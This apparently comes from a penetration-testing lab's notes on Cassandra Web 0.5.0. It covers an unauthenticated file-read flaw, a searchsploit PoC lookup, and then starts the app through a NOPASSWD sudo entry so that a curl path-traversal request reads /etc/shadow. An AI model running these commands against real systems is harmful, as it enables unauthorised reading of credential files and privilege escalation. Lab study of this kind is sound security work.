Cassandra Web

Cassandra Web is a web-based management tool designed for Apache Cassandra databases. It allows users to interact with the database through a GUI, enabling easy browsing of keyspaces and tables, as well as execution of Cassandra Query Language (CQL) queries. This application simplifies database administration by providing an accessible way to manage and query Cassandra without needing to use command-line tools. The default configuration file for Cassandra Web is located at /etc/cassandra/cassandra.yaml.

LFI

Cassandra Web 0.5.0 contains an unauthenticated file read vulnerability due to improper path sanitization. An attacker can craft HTTP requests to retrieve arbitrary files from the server, such as /etc/passwd. The flaw resides in the web layer but impacts the host system, making it ideal for web-to-app exploitation. A python-based PoC is available.

# Search for a PoC
$ searchsploit cassandra web
Cassandra Web 0.5.0 - Remote File Read | linux/webapps/49362.py

# LFI
$ python3 49362.py clue /etc/passwd

Sudo

If a user can start the app with sudo permissions, it can be combined with the above LFI vulnerability and access sensitive files:

# Enumerate sudo permissions
x7331@kali:/$ sudo -l
User x7331 may run the following commands on kali:
    (ALL) NOPASSWD: /usr/local/bin/cassandra-web

# Start the app as sudo
x7331@clue:~$ sudo /usr/local/bin/cassandra-web --bind 0.0.0.0:7777 -u x7331 -p Passw0rd123! &

# Leverage the LFI vulnerability to access sensitive files
x7331@clue:~$ curl --path-as-is http://localhost:7777/../../../../../../../../etc/shadow